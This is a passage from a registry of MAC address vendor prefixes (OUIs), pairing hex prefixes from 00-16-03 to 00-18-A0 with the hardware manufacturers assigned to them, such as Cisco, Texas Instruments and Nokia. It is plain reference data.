00-16-03 (hex) COOLKSKY Co., LTD 00-16-04 (hex) Sigpro 00-16-05 (hex) YORKVILLE SOUND INC. 00-16-06 (hex) Ideal Industries 00-16-07 (hex) Curves International Inc. 00-16-08 (hex) Sequans Communications 00-16-09 (hex) Unitech electronics co., ltd. 00-16-0A (hex) SWEEX Europe BV 00-16-0B (hex) TVWorks LLC 00-16-0C (hex) LPL DEVELOPMENT S.A. DE C.V 00-16-0D (hex) Be Here Corporation 00-16-0E (hex) Optica Technologies Inc. 00-16-0F (hex) BADGER METER INC 00-16-10 (hex) Carina Technology 00-16-11 (hex) Altecon Srl 00-16-12 (hex) Otsuka Electronics Co., Ltd. 00-16-13 (hex) LibreStream Technologies Inc. 00-16-14 (hex) Picosecond Pulse Labs 00-16-15 (hex) Nittan Company, Limited 00-16-16 (hex) BROWAN COMMUNICATION INC. 00-16-17 (hex) MSI 00-16-18 (hex) HIVION Co., Ltd. 00-16-19 (hex) La Factoría de Comunicaciones Aplicadas,S.L. 00-16-1A (hex) Dametric AB 00-16-1B (hex) Micronet Corporation 00-16-1C (hex) e:cue 00-16-1D (hex) Innovative Wireless Technologies, Inc. 00-16-1E (hex) Woojinnet 00-16-1F (hex) SUNWAVETEC Co., Ltd. 00-16-20 (hex) Sony Ericsson Mobile Communications AB 00-16-21 (hex) Colorado Vnet 00-16-22 (hex) BBH SYSTEMS GMBH 00-16-23 (hex) Interval Media 00-16-24 (hex) Teneros, Inc. 00-16-25 (hex) Impinj, Inc. 00-16-26 (hex) Motorola Mobility, Inc. 00-16-27 (hex) embedded-logic DESIGN AND MORE GmbH 00-16-28 (hex) Ultra Electronics Manufacturing and Card Systems 00-16-29 (hex) Nivus GmbH 00-16-2A (hex) Antik computers & communications s.r.o. 00-16-2B (hex) Togami Electric Mfg.co.,Ltd. 00-16-2C (hex) Xanboo 00-16-2D (hex) STNet Co., Ltd. 00-16-2E (hex) Space Shuttle Hi-Tech Co., Ltd. 00-16-2F (hex) Geutebrück GmbH 00-16-30 (hex) Vativ Technologies 00-16-31 (hex) Xteam 00-16-32 (hex) SAMSUNG ELECTRONICS CO., LTD. 00-16-33 (hex) Oxford Diagnostics Ltd. 00-16-34 (hex) Mathtech, Inc. 00-16-35 (hex) Hewlett-Packard Company 00-16-36 (hex) Quanta Computer Inc. 00-16-37 (hex) Citel Srl 00-16-38 (hex) TECOM Co., Ltd. 00-16-39 (hex) UBIQUAM Co.,Ltd 00-16-3A (hex) YVES TECHNOLOGY CO., LTD. 00-16-3B (hex) VertexRSI/General Dynamics 00-16-3C (hex) Rebox B.V. 00-16-3D (hex) Tsinghua Tongfang Legend Silicon Tech. Co., Ltd. 00-16-3E (hex) Xensource, Inc. 00-16-3F (hex) CReTE SYSTEMS Inc. 00-16-40 (hex) Asmobile Communication Inc. 00-16-41 (hex) Universal Global Scientific Industrial Co., Ltd. 00-16-42 (hex) Pangolin 00-16-43 (hex) Sunhillo Corporation 00-16-44 (hex) LITE-ON Technology Corp. 00-16-45 (hex) Power Distribution, Inc. 00-16-46 (hex) Cisco Systems 00-16-47 (hex) Cisco Systems 00-16-48 (hex) SSD Company Limited 00-16-49 (hex) SetOne GmbH 00-16-4A (hex) Vibration Technology Limited 00-16-4B (hex) Quorion Data Systems GmbH 00-16-4C (hex) PLANET INT Co., Ltd 00-16-4D (hex) Alcatel North America IP Division 00-16-4E (hex) Nokia Danmark A/S 00-16-4F (hex) World Ethnic Broadcastin Inc. 00-16-50 (hex) Herley General Microwave Israel. 00-16-51 (hex) Exeo Systems 00-16-52 (hex) Hoatech Technologies, Inc. 00-16-53 (hex) LEGO System A/S IE Electronics Division 00-16-54 (hex) Flex-P Industries Sdn. Bhd. 00-16-55 (hex) FUHO TECHNOLOGY Co., LTD 00-16-56 (hex) Nintendo Co., Ltd. 00-16-57 (hex) Aegate Ltd 00-16-58 (hex) Fusiontech Technologies Inc. 00-16-59 (hex) Z.M.P. RADWAG 00-16-5A (hex) Harman Specialty Group 00-16-5B (hex) Grip Audio 00-16-5C (hex) Trackflow Ltd 00-16-5D (hex) AirDefense, Inc. 00-16-5E (hex) Precision I/O 00-16-5F (hex) Fairmount Automation 00-16-60 (hex) Nortel 00-16-61 (hex) Novatium Solutions (P) Ltd 00-16-62 (hex) Liyuh Technology Ltd. 00-16-63 (hex) KBT Mobile 00-16-64 (hex) Prod-El SpA 00-16-65 (hex) Cellon France 00-16-66 (hex) Quantier Communication Inc. 00-16-67 (hex) A-TEC Subsystem INC. 00-16-68 (hex) Eishin Electronics 00-16-69 (hex) MRV Communication (Networks) LTD 00-16-6A (hex) TPS 00-16-6B (hex) Samsung Electronics 00-16-6C (hex) Samsung Electonics Digital Video System Division 00-16-6D (hex) Yulong Computer Telecommunication Scientific(shenzhen)Co.,Lt 00-16-6E (hex) Arbitron Inc. 00-16-6F (hex) Intel Corporation 00-16-70 (hex) SKNET Corporation 00-16-71 (hex) Symphox Information Co. 00-16-72 (hex) Zenway enterprise ltd 00-16-73 (hex) Bury GmbH & Co. KG 00-16-74 (hex) EuroCB (Phils.), Inc. 00-16-75 (hex) Motorola Mobility, Inc. 00-16-76 (hex) Intel Corporation 00-16-77 (hex) Bihl+Wiedemann GmbH 00-16-78 (hex) SHENZHEN BAOAN GAOKE ELECTRONICS CO., LTD 00-16-79 (hex) eOn Communications 00-16-7A (hex) Skyworth Overseas Dvelopment Ltd. 00-16-7B (hex) Haver&Boecker 00-16-7C (hex) iRex Technologies BV 00-16-7D (hex) Sky-Line Information Co., Ltd. 00-16-7E (hex) DIBOSS.CO.,LTD 00-16-7F (hex) Bluebird Soft Inc. 00-16-80 (hex) Bally Gaming + Systems 00-16-81 (hex) Vector Informatik GmbH 00-16-82 (hex) Pro Dex, Inc 00-16-83 (hex) WEBIO International Co.,.Ltd. 00-16-84 (hex) Donjin Co.,Ltd. 00-16-85 (hex) Elisa Oyj 00-16-86 (hex) Karl Storz Imaging 00-16-87 (hex) Chubb CSC-Vendor AP 00-16-88 (hex) ServerEngines LLC 00-16-89 (hex) Pilkor Electronics Co., Ltd 00-16-8A (hex) id-Confirm Inc 00-16-8B (hex) Paralan Corporation 00-16-8C (hex) DSL Partner AS 00-16-8D (hex) KORWIN CO., Ltd. 00-16-8E (hex) Vimicro corporation 00-16-8F (hex) GN Netcom as 00-16-90 (hex) J-TEK INCORPORATION 00-16-91 (hex) Moser-Baer AG 00-16-92 (hex) Scientific-Atlanta, Inc. 00-16-93 (hex) PowerLink Technology Inc. 00-16-94 (hex) Sennheiser Communications A/S 00-16-95 (hex) AVC Technology Limited 00-16-96 (hex) QDI Technology (H.K.) Limited 00-16-97 (hex) NEC Corporation 00-16-98 (hex) T&A Mobile Phones 00-16-99 (hex) Tonic DVB Marketing Ltd 00-16-9A (hex) Quadrics Ltd 00-16-9B (hex) Alstom Transport 00-16-9C (hex) Cisco Systems 00-16-9D (hex) Cisco Systems 00-16-9E (hex) TV One Ltd 00-16-9F (hex) Vimtron Electronics Co., Ltd. 00-16-A0 (hex) Auto-Maskin 00-16-A1 (hex) 3Leaf Networks 00-16-A2 (hex) CentraLite Systems, Inc. 00-16-A3 (hex) Ingeteam Transmission&Distribution, S.A. 00-16-A4 (hex) Ezurio Ltd 00-16-A5 (hex) Tandberg Storage ASA 00-16-A6 (hex) Dovado FZ-LLC 00-16-A7 (hex) AWETA G&P 00-16-A8 (hex) CWT CO., LTD. 00-16-A9 (hex) 2EI 00-16-AA (hex) Kei Communication Technology Inc. 00-16-AB (hex) PBI-Dansensor A/S 00-16-AC (hex) Toho Technology Corp. 00-16-AD (hex) BT-Links Company Limited 00-16-AE (hex) INVENTEL 00-16-AF (hex) Shenzhen Union Networks Equipment Co.,Ltd. 00-16-B0 (hex) VK Corporation 00-16-B1 (hex) KBS 00-16-B2 (hex) DriveCam Inc 00-16-B3 (hex) Photonicbridges (China) Co., Ltd. 00-16-B4 (hex) PRIVATE 00-16-B5 (hex) Motorola Mobility, Inc. 00-16-B6 (hex) Cisco-Linksys 00-16-B7 (hex) Seoul Commtech 00-16-B8 (hex) Sony Ericsson Mobile Communications 00-16-B9 (hex) ProCurve Networking 00-16-BA (hex) WEATHERNEWS INC. 00-16-BB (hex) Law-Chain Computer Technology Co Ltd 00-16-BC (hex) Nokia Danmark A/S 00-16-BD (hex) ATI Industrial Automation 00-16-BE (hex) INFRANET, Inc. 00-16-BF (hex) PaloDEx Group Oy 00-16-C0 (hex) Semtech Corporation 00-16-C1 (hex) Eleksen Ltd 00-16-C2 (hex) Avtec Systems Inc 00-16-C3 (hex) BA Systems Inc 00-16-C4 (hex) SiRF Technology, Inc. 00-16-C5 (hex) Shenzhen Xing Feng Industry Co.,Ltd 00-16-C6 (hex) North Atlantic Industries 00-16-C7 (hex) Cisco Systems 00-16-C8 (hex) Cisco Systems 00-16-C9 (hex) NAT Seattle, Inc. 00-16-CA (hex) Nortel 00-16-CB (hex) Apple Computer 00-16-CC (hex) Xcute Mobile Corp. 00-16-CD (hex) HIJI HIGH-TECH CO., LTD. 00-16-CE (hex) Hon Hai Precision Ind. Co., Ltd. 00-16-CF (hex) Hon Hai Precision Ind. Co., Ltd. 00-16-D0 (hex) ATech elektronika d.o.o. 00-16-D1 (hex) ZAT a.s. 00-16-D2 (hex) Caspian 00-16-D3 (hex) Wistron Corporation 00-16-D4 (hex) Compal Communications, Inc. 00-16-D5 (hex) Synccom Co., Ltd 00-16-D6 (hex) TDA Tech Pty Ltd 00-16-D7 (hex) Sunways AG 00-16-D8 (hex) Senea AB 00-16-D9 (hex) NINGBO BIRD CO.,LTD. 00-16-DA (hex) Futronic Technology Co. Ltd. 00-16-DB (hex) Samsung Electronics Co., Ltd. 00-16-DC (hex) ARCHOS 00-16-DD (hex) Gigabeam Corporation 00-16-DE (hex) FAST Inc 00-16-DF (hex) Lundinova AB 00-16-E0 (hex) 3Com Ltd 00-16-E1 (hex) SiliconStor, Inc. 00-16-E2 (hex) American Fibertek, Inc. 00-16-E3 (hex) ASKEY COMPUTER CORP. 00-16-E4 (hex) VANGUARD SECURITY ENGINEERING CORP. 00-16-E5 (hex) FORDLEY DEVELOPMENT LIMITED 00-16-E6 (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 00-16-E7 (hex) Dynamix Promotions Limited 00-16-E8 (hex) Sigma Designs, Inc. 00-16-E9 (hex) Tiba Medical Inc 00-16-EA (hex) Intel Corporation 00-16-EB (hex) Intel Corporation 00-16-EC (hex) Elitegroup Computer Systems Co., Ltd. 00-16-ED (hex) Digital Safety Technologies, Inc 00-16-EE (hex) RoyalDigital Inc. 00-16-EF (hex) Koko Fitness, Inc. 00-16-F0 (hex) Dell 00-16-F1 (hex) OmniSense, LLC 00-16-F2 (hex) Dmobile System Co., Ltd. 00-16-F3 (hex) CAST Information Co., Ltd 00-16-F4 (hex) Eidicom Co., Ltd. 00-16-F5 (hex) Dalian Golden Hualu Digital Technology Co.,Ltd 00-16-F6 (hex) Video Products Group 00-16-F7 (hex) L-3 Communications, Electrodynamics, Inc. 00-16-F8 (hex) AVIQTECH TECHNOLOGY CO., LTD. 00-16-F9 (hex) CETRTA POT, d.o.o., Kranj 00-16-FA (hex) ECI Telecom Ltd. 00-16-FB (hex) SHENZHEN MTC CO.,LTD. 00-16-FC (hex) TOHKEN CO.,LTD. 00-16-FD (hex) Jaty Electronics 00-16-FE (hex) Alps Electric Co., Ltd 00-16-FF (hex) Wamin Optocomm Mfg Corp 00-17-00 (hex) Motorola Mobility, Inc. 00-17-01 (hex) KDE, Inc. 00-17-02 (hex) Osung Midicom Co., Ltd 00-17-03 (hex) MOSDAN Internation Co.,Ltd 00-17-04 (hex) Shinco Electronics Group Co.,Ltd 00-17-05 (hex) Methode Electronics 00-17-06 (hex) Techfaith Wireless Communication Technology Limited. 00-17-07 (hex) InGrid, Inc 00-17-08 (hex) Hewlett-Packard Company 00-17-09 (hex) Exalt Communications 00-17-0A (hex) INEW DIGITAL COMPANY 00-17-0B (hex) Contela, Inc. 00-17-0C (hex) Twig Com Ltd. 00-17-0D (hex) Dust Networks Inc. 00-17-0E (hex) Cisco Systems 00-17-0F (hex) Cisco Systems 00-17-10 (hex) Casa Systems Inc. 00-17-11 (hex) GE Healthcare Bio-Sciences AB 00-17-12 (hex) ISCO International 00-17-13 (hex) Tiger NetCom 00-17-14 (hex) BR Controls Nederland bv 00-17-15 (hex) Qstik 00-17-16 (hex) Qno Technology Inc. 00-17-17 (hex) Leica Geosystems AG 00-17-18 (hex) Vansco Electronics Oy 00-17-19 (hex) AudioCodes USA, Inc 00-17-1A (hex) Winegard Company 00-17-1B (hex) Innovation Lab Corp. 00-17-1C (hex) NT MicroSystems, Inc. 00-17-1D (hex) DIGIT 00-17-1E (hex) Theo Benning GmbH & Co. KG 00-17-1F (hex) IMV Corporation 00-17-20 (hex) Image Sensing Systems, Inc. 00-17-21 (hex) FITRE S.p.A. 00-17-22 (hex) Hanazeder Electronic GmbH 00-17-23 (hex) Summit Data Communications 00-17-24 (hex) Studer Professional Audio GmbH 00-17-25 (hex) Liquid Computing 00-17-26 (hex) m2c Electronic Technology Ltd. 00-17-27 (hex) Thermo Ramsey Italia s.r.l. 00-17-28 (hex) Selex Communications 00-17-29 (hex) Ubicod Co.LTD 00-17-2A (hex) Proware Technology Corp. 00-17-2B (hex) Global Technologies Inc. 00-17-2C (hex) TAEJIN INFOTECH 00-17-2D (hex) Axcen Photonics Corporation 00-17-2E (hex) FXC Inc. 00-17-2F (hex) NeuLion Incorporated 00-17-30 (hex) Automation Electronics 00-17-31 (hex) ASUSTek COMPUTER INC. 00-17-32 (hex) Science-Technical Center "RISSA" 00-17-33 (hex) SFR 00-17-34 (hex) ADC Telecommunications 00-17-35 (hex) PRIVATE 00-17-36 (hex) iiTron Inc. 00-17-37 (hex) Industrie Dial Face S.p.A. 00-17-38 (hex) International Business Machines 00-17-39 (hex) Bright Headphone Electronics Company 00-17-3A (hex) Reach Systems Inc. 00-17-3B (hex) Cisco Systems, Inc. 00-17-3C (hex) Extreme Engineering Solutions 00-17-3D (hex) Neology 00-17-3E (hex) LeucotronEquipamentos Ltda. 00-17-3F (hex) Belkin Corporation 00-17-40 (hex) Bluberi Gaming Technologies Inc 00-17-41 (hex) DEFIDEV 00-17-42 (hex) FUJITSU LIMITED 00-17-43 (hex) Deck Srl 00-17-44 (hex) Araneo Ltd. 00-17-45 (hex) INNOTZ CO., Ltd 00-17-46 (hex) Freedom9 Inc. 00-17-47 (hex) Trimble 00-17-48 (hex) Neokoros Brasil Ltda 00-17-49 (hex) HYUNDAE YONG-O-SA CO.,LTD 00-17-4A (hex) SOCOMEC 00-17-4B (hex) Nokia Danmark A/S 00-17-4C (hex) Millipore 00-17-4D (hex) DYNAMIC NETWORK FACTORY, INC. 00-17-4E (hex) Parama-tech Co.,Ltd. 00-17-4F (hex) iCatch Inc. 00-17-50 (hex) GSI Group, MicroE Systems 00-17-51 (hex) Online Corporation 00-17-52 (hex) DAGS, Inc 00-17-53 (hex) nFore Technology Inc. 00-17-54 (hex) Arkino HiTOP Corporation Limited 00-17-55 (hex) GE Security 00-17-56 (hex) Vinci Labs Oy 00-17-57 (hex) RIX TECHNOLOGY LIMITED 00-17-58 (hex) ThruVision Ltd 00-17-59 (hex) Cisco Systems 00-17-5A (hex) Cisco Systems 00-17-5B (hex) ACS Solutions Switzerland Ltd. 00-17-5C (hex) SHARP CORPORATION 00-17-5D (hex) Dongseo system. 00-17-5E (hex) Zed-3 00-17-5F (hex) XENOLINK Communications Co., Ltd. 00-17-60 (hex) Naito Densei Machida MFG.CO.,LTD 00-17-61 (hex) ZKSoftware Inc. 00-17-62 (hex) Solar Technology, Inc. 00-17-63 (hex) Essentia S.p.A. 00-17-64 (hex) ATMedia GmbH 00-17-65 (hex) Nortel 00-17-66 (hex) Accense Technology, Inc. 00-17-67 (hex) Earforce AS 00-17-68 (hex) Zinwave Ltd 00-17-69 (hex) Cymphonix Corp 00-17-6A (hex) Avago Technologies 00-17-6B (hex) Kiyon, Inc. 00-17-6C (hex) Pivot3, Inc. 00-17-6D (hex) CORE CORPORATION 00-17-6E (hex) DUCATI SISTEMI 00-17-6F (hex) PAX Computer Technology(Shenzhen) Ltd. 00-17-70 (hex) Arti Industrial Electronics Ltd. 00-17-71 (hex) APD Communications Ltd 00-17-72 (hex) ASTRO Strobel Kommunikationssysteme GmbH 00-17-73 (hex) Laketune Technologies Co. Ltd 00-17-74 (hex) Elesta GmbH 00-17-75 (hex) TTE Germany GmbH 00-17-76 (hex) Meso Scale Diagnostics, LLC 00-17-77 (hex) Obsidian Research Corporation 00-17-78 (hex) Central Music Co. 00-17-79 (hex) QuickTel 00-17-7A (hex) ASSA ABLOY AB 00-17-7B (hex) Azalea Networks inc 00-17-7C (hex) Smartlink Network Systems Limited 00-17-7D (hex) IDT International Limited 00-17-7E (hex) Meshcom Technologies Inc. 00-17-7F (hex) Worldsmart Retech 00-17-80 (hex) Applied Biosystems B.V. 00-17-81 (hex) Greystone Data System, Inc. 00-17-82 (hex) LoBenn Inc. 00-17-83 (hex) Texas Instruments 00-17-84 (hex) Motorola Mobility, Inc. 00-17-85 (hex) Sparr Electronics Ltd 00-17-86 (hex) wisembed 00-17-87 (hex) Brother, Brother & Sons ApS 00-17-88 (hex) Philips Lighting BV 00-17-89 (hex) Zenitron Corporation 00-17-8A (hex) DARTS TECHNOLOGIES CORP. 00-17-8B (hex) Teledyne Technologies Incorporated 00-17-8C (hex) Independent Witness, Inc 00-17-8D (hex) Checkpoint Systems, Inc. 00-17-8E (hex) Gunnebo Cash Automation AB 00-17-8F (hex) NINGBO YIDONG ELECTRONIC CO.,LTD. 00-17-90 (hex) HYUNDAI DIGITECH Co, Ltd. 00-17-91 (hex) LinTech GmbH 00-17-92 (hex) Falcom Wireless Comunications Gmbh 00-17-93 (hex) Tigi Corporation 00-17-94 (hex) Cisco Systems 00-17-95 (hex) Cisco Systems 00-17-96 (hex) Rittmeyer AG 00-17-97 (hex) Telsy Elettronica S.p.A. 00-17-98 (hex) Azonic Technology Co., LTD 00-17-99 (hex) SmarTire Systems Inc. 00-17-9A (hex) D-Link Corporation 00-17-9B (hex) Chant Sincere CO., LTD. 00-17-9C (hex) DEPRAG SCHULZ GMBH u. CO. 00-17-9D (hex) Kelman Limited 00-17-9E (hex) Sirit Inc 00-17-9F (hex) Apricorn 00-17-A0 (hex) RoboTech srl 00-17-A1 (hex) 3soft inc. 00-17-A2 (hex) Camrivox Ltd. 00-17-A3 (hex) MIX s.r.l. 00-17-A4 (hex) Hewlett-Packard Company 00-17-A5 (hex) Ralink Technology Corp 00-17-A6 (hex) YOSIN ELECTRONICS CO., LTD. 00-17-A7 (hex) Mobile Computing Promotion Consortium 00-17-A8 (hex) EDM Corporation 00-17-A9 (hex) Sentivision 00-17-AA (hex) elab-experience inc. 00-17-AB (hex) Nintendo Co., Ltd. 00-17-AC (hex) O'Neil Product Development Inc. 00-17-AD (hex) AceNet Corporation 00-17-AE (hex) GAI-Tronics 00-17-AF (hex) Enermet 00-17-B0 (hex) Nokia Danmark A/S 00-17-B1 (hex) ACIST Medical Systems, Inc. 00-17-B2 (hex) SK Telesys 00-17-B3 (hex) Aftek Infosys Limited 00-17-B4 (hex) Remote Security Systems, LLC 00-17-B5 (hex) Peerless Systems Corporation 00-17-B6 (hex) Aquantia 00-17-B7 (hex) Tonze Technology Co. 00-17-B8 (hex) NOVATRON CO., LTD. 00-17-B9 (hex) Gambro Lundia AB 00-17-BA (hex) SEDO CO., LTD. 00-17-BB (hex) Syrinx Industrial Electronics 00-17-BC (hex) Touchtunes Music Corporation 00-17-BD (hex) Tibetsystem 00-17-BE (hex) Tratec Telecom B.V. 00-17-BF (hex) Coherent Research Limited 00-17-C0 (hex) PureTech Systems, Inc. 00-17-C1 (hex) CM Precision Technology LTD. 00-17-C2 (hex) Pirelli Broadband Solutions 00-17-C3 (hex) KTF Technologies Inc. 00-17-C4 (hex) Quanta Microsystems, INC. 00-17-C5 (hex) SonicWALL 00-17-C6 (hex) Cross Match Technologies Inc 00-17-C7 (hex) MARA Systems Consulting AB 00-17-C8 (hex) Kyocera Mita Corporation 00-17-C9 (hex) Samsung Electronics Co., Ltd. 00-17-CA (hex) Qisda Corporation 00-17-CB (hex) Juniper Networks 00-17-CC (hex) Alcatel-Lucent 00-17-CD (hex) CEC Wireless R&D Ltd. 00-17-CE (hex) MB International Telecom Labs srl 00-17-CF (hex) iMCA-GmbH 00-17-D0 (hex) Opticom Communications, LLC 00-17-D1 (hex) Nortel 00-17-D2 (hex) THINLINX PTY LTD 00-17-D3 (hex) Etymotic Research, Inc. 00-17-D4 (hex) Monsoon Multimedia, Inc 00-17-D5 (hex) Samsung Electronics Co., Ltd. 00-17-D6 (hex) Bluechips Microhouse Co.,Ltd. 00-17-D7 (hex) ION Geophysical Corporation Inc. 00-17-D8 (hex) Magnum Semiconductor, Inc. 00-17-D9 (hex) AAI Corporation 00-17-DA (hex) Spans Logic 00-17-DB (hex) CANKO TECHNOLOGIES INC. 00-17-DC (hex) DAEMYUNG ZERO1 00-17-DD (hex) Clipsal Australia 00-17-DE (hex) Advantage Six Ltd 00-17-DF (hex) Cisco Systems 00-17-E0 (hex) Cisco Systems 00-17-E1 (hex) DACOS Technologies Co., Ltd. 00-17-E2 (hex) Motorola Mobility, Inc. 00-17-E3 (hex) Texas Instruments 00-17-E4 (hex) Texas Instruments 00-17-E5 (hex) Texas Instruments 00-17-E6 (hex) Texas Instruments 00-17-E7 (hex) Texas Instruments 00-17-E8 (hex) Texas Instruments 00-17-E9 (hex) Texas Instruments 00-17-EA (hex) Texas Instruments 00-17-EB (hex) Texas Instruments 00-17-EC (hex) Texas Instruments 00-17-ED (hex) WooJooIT Ltd. 00-17-EE (hex) Motorola Mobility, Inc. 00-17-EF (hex) IBM Corp 00-17-F0 (hex) SZCOM Broadband Network Technology Co.,Ltd 00-17-F1 (hex) Renu Electronics Pvt Ltd 00-17-F2 (hex) Apple Computer 00-17-F3 (hex) Harris Corparation 00-17-F4 (hex) ZERON ALLIANCE 00-17-F5 (hex) LIG NEOPTEK 00-17-F6 (hex) Pyramid Meriden Inc. 00-17-F7 (hex) CEM Solutions Pvt Ltd 00-17-F8 (hex) Motech Industries Inc. 00-17-F9 (hex) Forcom Sp. z o.o. 00-17-FA (hex) Microsoft Corporation 00-17-FB (hex) FA 00-17-FC (hex) Suprema Inc. 00-17-FD (hex) Amulet Hotkey 00-17-FE (hex) TALOS SYSTEM INC. 00-17-FF (hex) PLAYLINE Co.,Ltd. 00-18-00 (hex) UNIGRAND LTD 00-18-01 (hex) Actiontec Electronics, Inc 00-18-02 (hex) Alpha Networks Inc. 00-18-03 (hex) ArcSoft Shanghai Co. LTD 00-18-04 (hex) E-TEK DIGITAL TECHNOLOGY LIMITED 00-18-05 (hex) Beijing InHand Networking Technology Co.,Ltd. 00-18-06 (hex) Hokkei Industries Co., Ltd. 00-18-07 (hex) Fanstel Corp. 00-18-08 (hex) SightLogix, Inc. 00-18-09 (hex) CRESYN 00-18-0A (hex) Meraki, Inc. 00-18-0B (hex) Brilliant Telecommunications 00-18-0C (hex) Optelian Access Networks 00-18-0D (hex) Terabytes Server Storage Tech Corp 00-18-0E (hex) Avega Systems 00-18-0F (hex) Nokia Danmark A/S 00-18-10 (hex) IPTrade S.A. 00-18-11 (hex) Neuros Technology International, LLC. 00-18-12 (hex) Beijing Xinwei Telecom Technology Co., Ltd. 00-18-13 (hex) Sony Ericsson Mobile Communications 00-18-14 (hex) Mitutoyo Corporation 00-18-15 (hex) GZ Technologies, Inc. 00-18-16 (hex) Ubixon Co., Ltd. 00-18-17 (hex) D. E. Shaw Research, LLC 00-18-18 (hex) Cisco Systems 00-18-19 (hex) Cisco Systems 00-18-1A (hex) AVerMedia Information Inc. 00-18-1B (hex) TaiJin Metal Co., Ltd. 00-18-1C (hex) Exterity Limited 00-18-1D (hex) ASIA ELECTRONICS CO.,LTD 00-18-1E (hex) GDX Technologies Ltd. 00-18-1F (hex) Palmmicro Communications 00-18-20 (hex) w5networks 00-18-21 (hex) SINDORICOH 00-18-22 (hex) CEC TELECOM CO.,LTD. 00-18-23 (hex) Delta Electronics, Inc. 00-18-24 (hex) Kimaldi Electronics, S.L. 00-18-25 (hex) PRIVATE 00-18-26 (hex) Cale Access AB 00-18-27 (hex) NEC UNIFIED SOLUTIONS NEDERLAND B.V. 00-18-28 (hex) e2v technologies (UK) ltd. 00-18-29 (hex) Gatsometer 00-18-2A (hex) Taiwan Video & Monitor 00-18-2B (hex) Softier 00-18-2C (hex) Ascend Networks, Inc. 00-18-2D (hex) Artec Group OÃœ 00-18-2E (hex) XStreamHD, LLC 00-18-2F (hex) Texas Instruments 00-18-30 (hex) Texas Instruments 00-18-31 (hex) Texas Instruments 00-18-32 (hex) Texas Instruments 00-18-33 (hex) Texas Instruments 00-18-34 (hex) Texas Instruments 00-18-35 (hex) Thoratec / ITC 00-18-36 (hex) Reliance Electric Limited 00-18-37 (hex) Universal ABIT Co., Ltd. 00-18-38 (hex) PanAccess Communications,Inc. 00-18-39 (hex) Cisco-Linksys LLC 00-18-3A (hex) Westell Technologies 00-18-3B (hex) CENITS Co., Ltd. 00-18-3C (hex) Encore Software Limited 00-18-3D (hex) Vertex Link Corporation 00-18-3E (hex) Digilent, Inc 00-18-3F (hex) 2Wire, Inc 00-18-40 (hex) 3 Phoenix, Inc. 00-18-41 (hex) High Tech Computer Corp 00-18-42 (hex) Nokia Danmark A/S 00-18-43 (hex) Dawevision Ltd 00-18-44 (hex) Heads Up Technologies, Inc. 00-18-45 (hex) NPL Pulsar Ltd. 00-18-46 (hex) Crypto S.A. 00-18-47 (hex) AceNet Technology Inc. 00-18-48 (hex) Vecima Networks Inc. 00-18-49 (hex) Pigeon Point Systems 00-18-4A (hex) Catcher, Inc. 00-18-4B (hex) Las Vegas Gaming, Inc. 00-18-4C (hex) Bogen Communications 00-18-4D (hex) Netgear Inc. 00-18-4E (hex) Lianhe Technologies, Inc. 00-18-4F (hex) 8 Ways Technology Corp. 00-18-50 (hex) Secfone Kft 00-18-51 (hex) SWsoft 00-18-52 (hex) StorLink Semiconductors, Inc. 00-18-53 (hex) Atera Networks LTD. 00-18-54 (hex) Argard Co., Ltd 00-18-55 (hex) Aeromaritime Systembau GmbH 00-18-56 (hex) EyeFi, Inc 00-18-57 (hex) Unilever R&D 00-18-58 (hex) TagMaster AB 00-18-59 (hex) Strawberry Linux Co.,Ltd. 00-18-5A (hex) uControl, Inc. 00-18-5B (hex) Network Chemistry, Inc 00-18-5C (hex) EDS Lab Pte Ltd 00-18-5D (hex) TAIGUEN TECHNOLOGY (SHEN-ZHEN) CO., LTD. 00-18-5E (hex) Nexterm Inc. 00-18-5F (hex) TAC Inc. 00-18-60 (hex) SIM Technology Group Shanghai Simcom Ltd., 00-18-61 (hex) Ooma, Inc. 00-18-62 (hex) Seagate Technology 00-18-63 (hex) Veritech Electronics Limited 00-18-64 (hex) Cybectec Inc. 00-18-65 (hex) Siemens Healthcare Diagnostics Manufacturing Ltd 00-18-66 (hex) Leutron Vision 00-18-67 (hex) Evolution Robotics Retail 00-18-68 (hex) Scientific Atlanta, A Cisco Company 00-18-69 (hex) KINGJIM 00-18-6A (hex) Global Link Digital Technology Co,.LTD 00-18-6B (hex) Sambu Communics CO., LTD. 00-18-6C (hex) Neonode AB 00-18-6D (hex) Zhenjiang Sapphire Electronic Industry CO. 00-18-6E (hex) 3Com Ltd 00-18-6F (hex) Setha Industria Eletronica LTDA 00-18-70 (hex) E28 Shanghai Limited 00-18-71 (hex) Hewlett-Packard Company 00-18-72 (hex) Expertise Engineering 00-18-73 (hex) Cisco Systems 00-18-74 (hex) Cisco Systems 00-18-75 (hex) AnaCise Testnology Pte Ltd 00-18-76 (hex) WowWee Ltd. 00-18-77 (hex) Amplex A/S 00-18-78 (hex) Mackware GmbH 00-18-79 (hex) dSys 00-18-7A (hex) Wiremold 00-18-7B (hex) 4NSYS Co. Ltd. 00-18-7C (hex) INTERCROSS, LLC 00-18-7D (hex) Armorlink shanghai Co. Ltd 00-18-7E (hex) RGB Spectrum 00-18-7F (hex) ZODIANET 00-18-80 (hex) Maxim Integrated Circuits 00-18-81 (hex) Buyang Electronics Industrial Co., Ltd 00-18-82 (hex) Huawei Technologies Co., Ltd. 00-18-83 (hex) FORMOSA21 INC. 00-18-84 (hex) FON 00-18-85 (hex) Avigilon Corporation 00-18-86 (hex) EL-TECH, INC. 00-18-87 (hex) Metasystem SpA 00-18-88 (hex) GOTIVE a.s. 00-18-89 (hex) WinNet Solutions Limited 00-18-8A (hex) Infinova LLC 00-18-8B (hex) Dell 00-18-8C (hex) Mobile Action Technology Inc. 00-18-8D (hex) Nokia Danmark A/S 00-18-8E (hex) Ekahau, Inc. 00-18-8F (hex) Montgomery Technology, Inc. 00-18-90 (hex) RadioCOM, s.r.o. 00-18-91 (hex) Zhongshan General K-mate Electronics Co., Ltd 00-18-92 (hex) ads-tec GmbH 00-18-93 (hex) SHENZHEN PHOTON BROADBAND TECHNOLOGY CO.,LTD 00-18-94 (hex) zimocom 00-18-95 (hex) Hansun Technologies Inc. 00-18-96 (hex) Great Well Electronic LTD 00-18-97 (hex) JESS-LINK PRODUCTS Co., LTD 00-18-98 (hex) KINGSTATE ELECTRONICS CORPORATION 00-18-99 (hex) ShenZhen jieshun Science&Technology Industry CO,LTD. 00-18-9A (hex) HANA Micron Inc. 00-18-9B (hex) Thomson Inc. 00-18-9C (hex) Weldex Corporation 00-18-9D (hex) Navcast Inc. 00-18-9E (hex) OMNIKEY GmbH. 00-18-9F (hex) Lenntek Corporation 00-18-A0 (hex) Cierma Ascenseurs 00-18-A1 